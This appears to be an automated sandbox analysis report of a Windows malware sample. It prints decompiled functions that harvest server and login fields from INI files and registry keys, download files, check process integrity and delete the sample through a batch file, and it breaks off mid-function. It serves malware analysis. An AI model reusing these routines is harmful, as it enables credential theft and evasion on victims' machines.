              • Part of subcall function 00403D00: CreateMutexW.KERNEL32(0041A2C8,00000000,?,?,?,?,?), ref: 00403D21
            • WaitForSingleObject.KERNEL32(000003E8,?,?,743C152E,00000002), ref: 0040F1BC
            • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF,?,?,743C152E), ref: 0040F24D
            • accept.WS2_32(?,00000000,00000000), ref: 0040F2D9
            • WaitForMultipleObjects.KERNEL32(?,?,00000000,00000000), ref: 0040F2ED
            • CloseHandle.KERNEL32(?), ref: 0040F30E
            • CloseHandle.KERNEL32(?), ref: 0040F31D
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Wait$CloseHandleMultipleObjects$CreateMutexObjectSingleaccept
            • String ID:
            • API String ID: 38240579-0
            • Opcode ID: 1bb33c0d4e62535128bdae73a4527e72e61dca1b85d30bae2fd7be39ad9cba61
            • Instruction ID: 50ae931a654e9e3f08e77c0f7aec0db01f409702cd3cba05583d5fd671da2c37
            • Opcode Fuzzy Hash: 1bb33c0d4e62535128bdae73a4527e72e61dca1b85d30bae2fd7be39ad9cba61
            • Instruction Fuzzy Hash: 6A519C31008341ABC720EF65DC44D6FB7E8EBC4714F500A3EF990A26A1D7399D098B1A
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00407C5C Relevance: 10.7, APIs: 7, Instructions: 171memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 95%
            			E00407C5C(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				short _v524;
				char _v564;
				short _v576;
				short _v588;
				short _v600;
				short _v608;
				short* _v612;
				int _v616;
				WCHAR* _v620;
				WCHAR* _v624;
				WCHAR* _v628;
				WCHAR* _v632;
				void* __edi;
				void* __esi;
				WCHAR* _t51;
				WCHAR* _t52;
				WCHAR* _t55;
				void* _t60;
				void* _t62;
				void* _t64;
				void* _t66;
				long _t70;
				WCHAR* _t71;
				int _t75;
				long _t79;
				long _t82;
				WCHAR* _t83;
				void* _t84;
				WCHAR* _t88;
				WCHAR* _t89;
				WCHAR* _t107;
				WCHAR* _t108;
				intOrPtr _t121;
				signed int _t122;
				void* _t124;

				_t124 = (_t122 & 0xfffffff8) - 0x274;
				if(E00415D45( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L20:
					return 1;
				}
				_t127 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_t51 = HeapAlloc( *0x41bc68, 8, 0x20002);
					_v624 = _t51;
					__eflags = _t51;
					if(_t51 == 0) {
						goto L20;
					}
					_t52 = GetPrivateProfileStringW(0, 0, 0, _t51, 0xffff,  &_v524);
					__eflags = _t52;
					if(_t52 <= 0) {
						L19:
						E00410418(_v624);
						goto L20;
					}
					_t9 =  &(_t52[0]); // 0x1
					_t55 = E0041131B(_v624, _t9);
					__eflags = _t55;
					if(_t55 == 0) {
						goto L19;
					}
					_t107 = HeapAlloc( *0x41bc68, 8, 0xc20);
					_v620 = _t107;
					__eflags = _t107;
					if(_t107 == 0) {
						goto L19;
					} else {
						_t12 =  &(_t107[0x1fe]); // 0x3fc
						_v612 =  &(_t12[0xff]);
						_v628 = _v624;
						_t60 = 0x33;
						E0040F369(_t60,  &_v608);
						_t62 = 0x34;
						E0040F369(_t62,  &_v588);
						_t64 = 0x35;
						E0040F369(_t64,  &_v576);
						_t66 = 0x36;
						E0040F369(_t66,  &_v600);
						goto L9;
						L17:
						_t71 = E00411359(_v628, 1);
						_v632 = _t71;
						__eflags = _t71;
						if(_t71 != 0) {
							_t107 = _v620;
							L9:
							_t70 = GetPrivateProfileStringW(_v628,  &_v608, 0, _t107, 0xff,  &_v524);
							__eflags = _t70;
							if(_t70 > 0) {
								_t75 = GetPrivateProfileIntW(_v628,  &_v588, 0x15,  &_v524);
								_v616 = _t75;
								__eflags = _t75 - 1 - 0xfffe;
								if(_t75 - 1 <= 0xfffe) {
									_t108 =  &(_t107[0xff]);
									_t79 = GetPrivateProfileStringW(_v628,  &_v576, 0, _t108, 0xff,  &_v524);
									__eflags = _t79;
									if(_t79 > 0) {
										_t32 =  &(_t108[0xff]); // 0x0
										_t119 = _t32;
										_t82 = GetPrivateProfileStringW(_v628,  &_v600, 0, _t32, 0xff,  &_v524);
										__eflags = _t82;
										if(_t82 > 0) {
											_t83 = E00407B30(_v628, _t119);
											__eflags = _t83;
											if(_t83 > 0) {
												_t120 =  &_v564;
												_t84 = 0x2c;
												E0040F369(_t84,  &_v564);
												_push(_v616);
												_t38 =  &(_t108[0xff]); // 0x0
												_push(_v620);
												_push(_t108);
												_t109 = _v612;
												_t88 = E004111A5(_t120, 0x311, _v612, _t120);
												_t124 = _t124 + 0x14;
												__eflags = _t88;
												if(_t88 > 0) {
													_t121 = _a4;
													_t89 = E00410818(_t88, _t121, _t109);
													__eflags = _t89;
													if(_t89 != 0) {
														_t42 = _t121 + 4;
														 *_t42 =  &(( *(_t121 + 4))[0]);
														__eflags =  *_t42;
													}
												}
											}
										}
									}
								}
							}
							goto L17;
						} else {
							E00410418(_v620);
							goto L19;
						}
					}
				} else {
					E00407C02(_t127,  &_v524, _a4);
					goto L20;
				}
			}






































            0x00407c62
            0x00407c7d
            0x00407e59
            0x00407e61
            0x00407e61
            0x00407c83
            0x00407c86
            0x00407cad
            0x00407cb1
            0x00407cb5
            0x00407cb7
            0x00000000
            0x00000000
            0x00407cd1
            0x00407cd3
            0x00407cd5
            0x00407e50
            0x00407e54
            0x00000000
            0x00407e54
            0x00407cdb
            0x00407ce2
            0x00407ce7
            0x00407ce9
            0x00000000
            0x00000000
            0x00407cfe
            0x00407d00
            0x00407d04
            0x00407d06
            0x00000000
            0x00407d0c
            0x00407d0c
            0x00407d17
            0x00407d21
            0x00407d29
            0x00407d2a
            0x00407d35
            0x00407d36
            0x00407d41
            0x00407d42
            0x00407d4d
            0x00407d4e
            0x00407d53
            0x00407e30
            0x00407e36
            0x00407e3b
            0x00407e3f
            0x00407e41
            0x00407d55
            0x00407d59
            0x00407d70
            0x00407d72
            0x00407d74
            0x00407d8a
            0x00407d90
            0x00407d95
            0x00407d9a
            0x00407da6
            0x00407db8
            0x00407dba
            0x00407dbc
            0x00407dc4
            0x00407dc4
            0x00407dd6
            0x00407dd8
            0x00407dda
            0x00407de1
            0x00407de6
            0x00407de8
            0x00407dec
            0x00407df0
            0x00407df1
            0x00407df6
            0x00407dfa
            0x00407e00
            0x00407e0a
            0x00407e0b
            0x00407e12
            0x00407e17
            0x00407e1a
            0x00407e1c
            0x00407e1e
            0x00407e24
            0x00407e29
            0x00407e2b
            0x00407e2d
            0x00407e2d
            0x00407e2d
            0x00407e2d
            0x00407e2b
            0x00407e1c
            0x00407de8
            0x00407dda
            0x00407dbc
            0x00407d9a
            0x00000000
            0x00407e47
            0x00407e4b
            0x00000000
            0x00407e4b
            0x00407e41
            0x00407c88
            0x00407c90
            0x00000000
            0x00407c90

            APIs
              • Part of subcall function 00415D45: PathCombineW.SHLWAPI(?,?,004014A8,004038F5,?,?,?,00000000), ref: 00415D65
            • HeapAlloc.KERNEL32(00000008,00020002,?), ref: 00407CAD
            • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00407CD1
            • HeapAlloc.KERNEL32(00000008,00000C20), ref: 00407CFC
            • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00407D70
            • GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 00407D8A
            • GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 00407DB8
            • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00407DD6
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: PrivateProfile$String$AllocHeap$CombinePath
            • String ID:
            • API String ID: 3432043379-0
            • Opcode ID: e67ffffbd66bc683c4423983df1ebdd3b12ff166b052b57e48d00f8ea7543a47
            • Instruction ID: 38683e3e3a5ab991a72e64398b02a8d7d3e935d5e1175a209ea4b792169ca162
            • Opcode Fuzzy Hash: e67ffffbd66bc683c4423983df1ebdd3b12ff166b052b57e48d00f8ea7543a47
            • Instruction Fuzzy Hash: 88518331908706ABE610EB65CC45FABB7EDEF84704F00483EBA54E32A1D774ED458B96
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00414AF8 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 86COMMON
            Download Yara Rule
            C-Code - Quality: 80%
            			E00414AF8(void* __ebx, void* __edi, char _a4) {
				short _v24;
				intOrPtr _v28;
				char _v72;
				short _v592;
				char _v852;
				char _v1392;
				void* _t33;
				signed int _t46;
				char _t55;

				if(E004158F8(L"bat",  &_v592) == 0) {
					L7:
					return 0;
				}
				CharToOemW( &_v592,  &_v852);
				_push( &_v852);
				if(E00411233( &_a4, "@echo off\r\n%s\r\ndel /F \"%s\"\r\n", _a4) == 0xffffffff) {
					L6:
					E004158D7( &_v592);
					goto L7;
				}
				_t33 = E004156EB( &_v592, _a4, _t29);
				E00410418(_a4);
				if(_t33 == 0) {
					goto L6;
				}
				_push(__edi);
				_push( &_v592);
				if(E004111A5( &_v592, 0x10e,  &_v1392, L"/c \"%s\"") <= 0xffffffff || GetEnvironmentVariableW(L"ComSpec",  &_v592, 0x104) - 1 > 0x102) {
					goto L6;
				} else {
					_t55 = 0x44;
					E004104CB( &_v72,  &_v72, 0, _t55);
					_v24 = 0;
					_v72 = _t55;
					_v28 = 1;
					_t46 = E00411CDD( &_v592,  &_v1392, 0,  &_v72, 0);
					asm("sbb eax, eax");
					return  ~( ~_t46);
				}
			}












            0x00414b14
            0x00414c07
            0x00000000
            0x00414c07
            0x00414b28
            0x00414b34
            0x00414b4c
            0x00414bfb
            0x00414c02
            0x00000000
            0x00414c02
            0x00414b5e
            0x00414b68
            0x00414b70
            0x00000000
            0x00000000
            0x00414b76
            0x00414b7d
            0x00414b99
            0x00000000
            0x00414bba
            0x00414bbc
            0x00414bc4
            0x00414bcc
            0x00414be4
            0x00414be7
            0x00414bee
            0x00414bf5
            0x00000000
            0x00414bf7

            APIs
              • Part of subcall function 004158F8: GetTempPathW.KERNEL32(000000F6,?), ref: 0041590F
            • CharToOemW.USER32 ref: 00414B28
              • Part of subcall function 004156EB: CreateFileW.KERNEL32(00414B12,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,0041596B,00414B12,00000000,00000000,00414B12,?), ref: 00415705
              • Part of subcall function 004156EB: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0041596B,00414B12,00000000,00000000,00414B12,?), ref: 00415728
              • Part of subcall function 004156EB: CloseHandle.KERNEL32(00000000,?,0041596B,00414B12,00000000,00000000,00414B12,?), ref: 00415735
              • Part of subcall function 00410418: HeapFree.KERNEL32(00000000,00000000,00411C0D,00000000,?,?,?,?,0040373A,00000000,00403AF4), ref: 0041042B
            • GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00414BAC
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: File$CharCloseCreateEnvironmentFreeHandleHeapPathTempVariableWrite
            • String ID: /c "%s"$@echo off%sdel /F "%s"$ComSpec$bat
            • API String ID: 1639923935-3344086482
            • Opcode ID: 57dfbf5cad99cfefd78f659124f5c6b3b1bc40c5ae48922e4b72889cf2e3f4fc
            • Instruction ID: fd7854fd5ad76f91cba6030d1c518433d330f7a5035e330c159c2953a5de0b63
            • Opcode Fuzzy Hash: 57dfbf5cad99cfefd78f659124f5c6b3b1bc40c5ae48922e4b72889cf2e3f4fc
            • Instruction Fuzzy Hash: FB21717194510CAEDB10EBA4CC45FEE77ACDB44304F6045A7B648E6190E678EBC98BA8
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004120C3 Relevance: 10.6, APIs: 7, Instructions: 78filememorysynchronizationCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E004120C3(void* __edi, void* _a4, WCHAR* _a8, intOrPtr _a12, void* _a16) {
				char _v5;
				long _v12;
				struct _OVERLAPPED* _v16;
				long _v20;
				long _t32;
				void* _t37;
				void* _t39;

				_v5 = 0;
				_t39 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
				if(_t39 == 0xffffffff) {
					L15:
					return _v5;
				}
				_t37 = HeapAlloc( *0x41bc68, 8, 0x1004);
				if(_t37 == 0) {
					L13:
					CloseHandle(_t39);
					if(_v5 == 0) {
						E004158D7(_a8);
					}
					goto L15;
				}
				_v16 = 0;
				while(_a16 == 0 || WaitForSingleObject(_a16, 0) == 0x102) {
					if(InternetReadFile(_a4, _t37, 0x1000,  &_v12) == 0) {
						break;
					}
					if(_v12 == 0) {
						FlushFileBuffers(_t39);
						_v5 = 1;
						break;
					}
					if(WriteFile(_t39, _t37, _v12,  &_v20, 0) == 0) {
						break;
					}
					_t32 = _v12;
					if(_t32 != _v20) {
						break;
					}
					_v16 = _v16 + _t32;
					if(_v16 <= _a12) {
						continue;
					}
					break;
				}
				E00410418(_t37);
				goto L13;
			}










            0x004120e0
            0x004120e9
            0x004120ee
            0x00412192
            0x00412198
            0x00412198
            0x00412108
            0x0041210c
            0x0041217d
            0x0041217e
            0x00412188
            0x0041218d
            0x0041218d
            0x00000000
            0x00412188
            0x0041210e
            0x00412111
            0x0041213c
            0x00000000
            0x00000000
            0x00412141
            0x0041216d
            0x00412173
            0x00000000
            0x00412173
            0x00412155
            0x00000000
            0x00000000
            0x00412157
            0x0041215d
            0x00000000
            0x00000000
            0x0041215f
            0x00412168
            0x00000000
            0x00000000
            0x00000000
            0x0041216a
            0x00412178
            0x00000000

            APIs
            • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,00000000), ref: 004120E3
            • HeapAlloc.KERNEL32(00000008,00001004,?), ref: 00412102
            • WaitForSingleObject.KERNEL32(?,00000000), ref: 0041211A
            • InternetReadFile.WININET(00001000,00000000,00001000,?), ref: 00412134
            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0041214D
            • FlushFileBuffers.KERNEL32(00000000), ref: 0041216D
            • CloseHandle.KERNEL32(00000000), ref: 0041217E
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: File$AllocBuffersCloseCreateFlushHandleHeapInternetObjectReadSingleWaitWrite
            • String ID:
            • API String ID: 1233354954-0
            • Opcode ID: 53e5532f3dd45149540f489e0a98986dba8f7c36f2b84a45625c1263489394e2
            • Instruction ID: a930a72450fb15c563a02f30f5f67bdc1121a79ac7d8d44b00cac76f7d30080c
            • Opcode Fuzzy Hash: 53e5532f3dd45149540f489e0a98986dba8f7c36f2b84a45625c1263489394e2
            • Instruction Fuzzy Hash: 47218E35900258BFEB11AFA49D89FEF7B79EB44341F00806AF650F11A0C7B98D91CB28
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00411B66 Relevance: 10.6, APIs: 7, Instructions: 76COMMON
            Download Yara Rule
            C-Code - Quality: 95%
            			E00411B66(void* __ecx) {
				long _v8;
				void* _v12;
				char* _t21;
				signed char _t22;
				DWORD* _t25;
				void* _t35;

				_t28 = 0;
				if(OpenProcessToken(0xffffffff, 8,  &_v12) == 0) {
					L15:
					return _t28;
				}
				if(GetTokenInformation(_v12, 0x19, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L14:
					CloseHandle(_v12);
					goto L15;
				} else {
					_t16 = _v8;
					if(_v8 == 0) {
						goto L14;
					}
					_t35 = E004103ED(_t16);
					if(_t35 == 0) {
						L13:
						goto L14;
					}
					if(GetTokenInformation(_v12, 0x19, _t35, _v8,  &_v8) != 0) {
						_t21 = GetSidSubAuthorityCount( *_t35);
						if(_t21 != 0) {
							_t22 =  *_t21;
							if(_t22 > 0) {
								_t25 = GetSidSubAuthority( *_t35, (_t22 & 0x000000ff) - 1);
								if(_t25 != 0) {
									if( *_t25 >= 0x2000) {
										asm("sbb bl, bl");
										_t28 = 3;
									} else {
										_t28 = 1;
									}
								}
							}
						}
					}
					E00410418(_t35);
					goto L13;
				}
			}









            0x00411b74
            0x00411b7e
            0x00411c18
            0x00411c1c
            0x00411c1c
            0x00411b9a
            0x00411c0e
            0x00411c11
            0x00000000
            0x00411ba7
            0x00411ba7
            0x00411bac
            0x00000000
            0x00000000
            0x00411bb4
            0x00411bb8
            0x00411c0d
            0x00000000
            0x00411c0d
            0x00411bcb
            0x00411bcf
            0x00411bd7
            0x00411bd9
            0x00411bdd
            0x00411be6
            0x00411bee
            0x00411bf7
            0x00411c02
            0x00411c04
            0x00411bf9
            0x00411bf9
            0x00411bf9
            0x00411bf7
            0x00411bee
            0x00411bdd
            0x00411bd7
            0x00411c08
            0x00000000
            0x00411c08

            APIs
            • OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000,?,?,?,0040373A,00000000,00403AF4,?,00000000), ref: 00411B76
            • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,?,?,?,?,0040373A,00000000,00403AF4,?,00000000), ref: 00411B96
            • GetLastError.KERNEL32(?,?,?,?,0040373A,00000000,00403AF4,?,00000000), ref: 00411B9C
              • Part of subcall function 004103ED: HeapAlloc.KERNEL32(00000008,-00000004,00411BB4,00000000,?,?,?,?,0040373A,00000000,00403AF4,?,00000000), ref: 004103F9
            • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?,?,?,?,0040373A,00000000,00403AF4,?,00000000), ref: 00411BC7
            • GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,?,0040373A,00000000,00403AF4,?,00000000), ref: 00411BCF
            • GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,?,0040373A,00000000,00403AF4,?,00000000), ref: 00411BE6
            • CloseHandle.KERNEL32(?,?,?,?,?,0040373A,00000000,00403AF4,?,00000000), ref: 00411C11
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Token$AuthorityInformation$AllocCloseCountErrorHandleHeapLastOpenProcess
            • String ID:
            • API String ID: 2107185229-0
            • Opcode ID: 7035cd2eba30c678725945b1f2b85b36046f6b7e3e8dcd614a1afbf2070d6f95
            • Instruction ID: 20ea3f1884a4df6ef3ede4cce02250ca100d24f97680b0dc1803197af68f6ea1
            • Opcode Fuzzy Hash: 7035cd2eba30c678725945b1f2b85b36046f6b7e3e8dcd614a1afbf2070d6f95
            • Instruction Fuzzy Hash: 5B11D635280158BFEB105BA4CD84EEF7BADDB02355F100136F681E6170E3399EC5DAA8
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004148B6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60registryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E004148B6(short* _a4) {
				char _v5;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				long _t18;

				_v5 = 0;
				_t18 = RegCreateKeyExW(0x80000001, L"SOFTWARE\\Microsoft", 0, 0, 0, 4, 0,  &_v16, 0);
				_t33 = _t18;
				if(_t18 == 0) {
					_v12 = 0;
					do {
						E0041471A(6, 4, _t33, 2, _a4);
						if(RegCreateKeyExW(_v16, _a4, 0, 0, 0, 3, 0,  &_v20,  &_v24) != 0) {
							goto L4;
						} else {
							RegCloseKey(_v20);
							if(_v24 == 1) {
								_v5 = 1;
							} else {
								goto L4;
							}
						}
						L7:
						RegCloseKey(_v16);
						goto L8;
						L4:
						_v12 = _v12 + 1;
					} while (_v12 < 0x64);
					goto L7;
				}
				L8:
				return _v5;
			}









            0x004148db
            0x004148de
            0x004148e0
            0x004148e2
            0x004148eb
            0x004148ee
            0x004148f7
            0x00414914
            0x00000000
            0x00414916
            0x00414919
            0x0041491f
            0x0041492c
            0x00000000
            0x00000000
            0x00000000
            0x0041491f
            0x00414930
            0x00414933
            0x00000000
            0x00414921
            0x00414921
            0x00414924
            0x00000000
            0x0041492a
            0x00414936
            0x0041493c

            APIs
            • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 004148DE
              • Part of subcall function 0041471A: CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 0041483C
            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?), ref: 00414910
            • RegCloseKey.ADVAPI32(?), ref: 00414919
            • RegCloseKey.ADVAPI32(?), ref: 00414933
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CloseCreate$CharUpper
            • String ID: SOFTWARE\Microsoft$d
            • API String ID: 1794619670-1227932965
            • Opcode ID: fb1ee502388fc22c8e2bbdb0aa46ac9935331f1cfdcdb0616543e26a9de008e5
            • Instruction ID: 96d033dfb5bdcef8659bfc8659b0b06969e6c8006d30fb3bbe8ba7a7a7caa0b1
            • Opcode Fuzzy Hash: fb1ee502388fc22c8e2bbdb0aa46ac9935331f1cfdcdb0616543e26a9de008e5
            • Instruction Fuzzy Hash: D51161B590020CBEEB119FE49D81EFFBB7CEB55388F104066F54172160D2759E859BB4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00413904 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
            Download Yara Rule
            C-Code - Quality: 45%
            			E00413904(intOrPtr _a4) {
				struct _ACL* _v8;
				struct _SECURITY_DESCRIPTOR* _v12;
				int _v16;
				int _v20;
				void** _t11;
				int _t16;
				struct _ACL* _t18;

				_t18 = 0;
				E00411ADE(L"SeSecurityPrivilege");
				_push(0);
				_t11 =  &_v12;
				_push(_t11);
				_push(1);
				_push(L"S:(ML;CIOI;NRNWNX;;;LW)");
				L00416BAA();
				if(_t11 != 0) {
					_v8 = 0;
					_t16 = GetSecurityDescriptorSacl(_v12,  &_v20,  &_v8,  &_v16);
					if(_t16 != 0) {
						__imp__SetNamedSecurityInfoW(_a4, 1, 0x10, 0, 0, 0, _v8);
						if(_t16 == 0) {
							_t18 = 1;
						}
					}
					LocalFree(_v12);
				}
				return _t18;
			}










            0x00413910
            0x00413912
            0x00413917
            0x00413918
            0x0041391b
            0x0041391c
            0x0041391e
            0x00413923
            0x0041392a
            0x0041393b
            0x0041393e
            0x00413946
            0x00413955
            0x0041395d
            0x0041395f
            0x0041395f
            0x0041395d
            0x00413964
            0x00413964
            0x0041396e

            APIs
              • Part of subcall function 00411ADE: GetCurrentThread.KERNEL32 ref: 00411AEE
              • Part of subcall function 00411ADE: OpenThreadToken.ADVAPI32(00000000), ref: 00411AF5
              • Part of subcall function 00411ADE: OpenProcessToken.ADVAPI32(000000FF,00000020,?), ref: 00411B07
            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000), ref: 00413923
            • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,00000000,S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000,SeSecurityPrivilege,00000000), ref: 0041393E
            • SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,?), ref: 00413955
            • LocalFree.KERNEL32(00000000), ref: 00413964
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Security$Descriptor$OpenThreadToken$ConvertCurrentFreeInfoLocalNamedProcessSaclString
            • String ID: S:(ML;CIOI;NRNWNX;;;LW)$SeSecurityPrivilege
            • API String ID: 3555451682-1937014404
            • Opcode ID: 35f515591c377536809d96ac273fc5f255dedd1977d9bcec86bffdb440d6c78d
            • Instruction ID: b4713ee99fad8ffcfa99ee7d091a640babbd7a48f3e5c89b33af728e9fe2cc7e
            • Opcode Fuzzy Hash: 35f515591c377536809d96ac273fc5f255dedd1977d9bcec86bffdb440d6c78d
            • Instruction Fuzzy Hash: DDF08CB564020CBEEF009FA08D81EEF7B7CAB04744F000066FA01B11A0D6B59B849A28
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00408BFC Relevance: 9.2, APIs: 6, Instructions: 209registrymemoryCOMMON
            Download Yara Rule
            C-Code - Quality: 96%
            			E00408BFC(char* __ecx) {
				int _v8;
				void* _v12;
				signed int _v16;
				int _v20;
				intOrPtr _v24;
				void* _v28;
				intOrPtr _v32;
				char _v36;
				void* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char* _v56;
				char _v68;
				char _v92;
				char _v100;
				char _v120;
				char _v140;
				char _v160;
				char _v224;
				char _v292;
				short _v812;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t73;
				void* _t74;
				void* _t76;
				void* _t82;
				void* _t84;
				void* _t86;
				void* _t88;
				intOrPtr _t90;
				void* _t97;
				int _t108;
				int _t116;
				int _t120;
				void* _t121;
				signed int _t123;
				void* _t125;
				void* _t128;
				void* _t131;
				int _t138;
				intOrPtr _t141;
				char* _t144;
				signed int _t148;
				void* _t150;
				void* _t151;

				_t134 = __ecx;
				_t73 = HeapAlloc( *0x41bc68, 8, 0xc0c);
				_t131 = _t73;
				_t138 = 0;
				_v28 = _t131;
				if(_t131 == 0) {
					return _t73;
				} else {
					_t74 = 0x5a;
					E0040F369(_t74,  &_v224);
					_t144 =  &_v292;
					_t76 = 0x5b;
					E0040F369(_t76, _t144);
					_v56 =  &_v224;
					_v52 = _t144;
					E004104CB( &_v36,  &_v36, 0, 8);
					_t82 = 0x5c;
					E0040F369(_t82,  &_v120);
					_t84 = 0x5d;
					E0040F369(_t84,  &_v160);
					_t86 = 0x5e;
					E0040F369(_t86,  &_v68);
					_t148 =  &_v140;
					_t88 = 0x5f;
					E0040F369(_t88, _t148);
					_t12 = _t131 + 0x3fc; // 0x0
					_t90 = _t12;
					_v24 = _t90;
					_v44 = _t131 + 0x1fe;
					_v48 = _t90 + 0x1fe;
					_v16 = 0;
					do {
						if(RegOpenKeyExW(0x80000001,  *(_t150 + _v16 * 4 - 0x34), _t138, 8,  &_v12) != 0) {
							goto L22;
						}
						_v20 = _t138;
						_v8 = 0x104;
						if(RegEnumKeyExW(_v12, _t138,  &_v812,  &_v8, _t138, _t138, _t138, _t138) != 0) {
							L21:
							RegCloseKey(_v12);
							goto L22;
						} else {
							goto L4;
						}
						do {
							L4:
							_v20 = _v20 + 1;
							_t108 = E004143B6(_v12, 0xff, _t134, _v28,  &_v812,  &_v120);
							_t148 = _t148 | 0xffffffff;
							_v8 = _t108;
							if(_t108 != _t148 && _t108 > 0) {
								_t140 = _v44;
								_t116 = E004143B6(_v12, 0xff, _t134, _v44,  &_v812,  &_v160);
								_v8 = _t116;
								if(_t116 == _t148 || _t116 <= 0) {
									_t120 = E004143B6(_v12, 0xff, _t134, _t140,  &_v812,  &_v68);
									_v8 = _t120;
									if(_t120 == _t148 || _t120 <= 0) {
										goto L19;
									} else {
										goto L10;
									}
								} else {
									L10:
									_t121 = _v12;
									_t134 =  &_v812;
									_v40 = _t121;
									if(RegOpenKeyExW(_t121,  &_v812, 0, 1,  &_v40) != 0) {
										_t123 = _t148;
									} else {
										_t148 =  &_v40;
										_t123 = E0041449E(_t148,  &_v140, _t122, _v24, 0xff);
									}
									_v8 = _t123;
									if(_t123 != 0xffffffff && _t123 > 0) {
										_t141 = _v24;
										if(E00408BA1(_t141) > 0) {
											_t148 =  &_v100;
											_t125 = 0x2d;
											E0040F369(_t125, _t148);
											_push(_v28);
											_push(_t141);
											_push(_v44);
											_t142 = _v48;
											_t128 = E004111A5(_t148, 0x307, _v48, _t148);
											_t151 = _t151 + 0x10;
											if(_t128 > 0) {
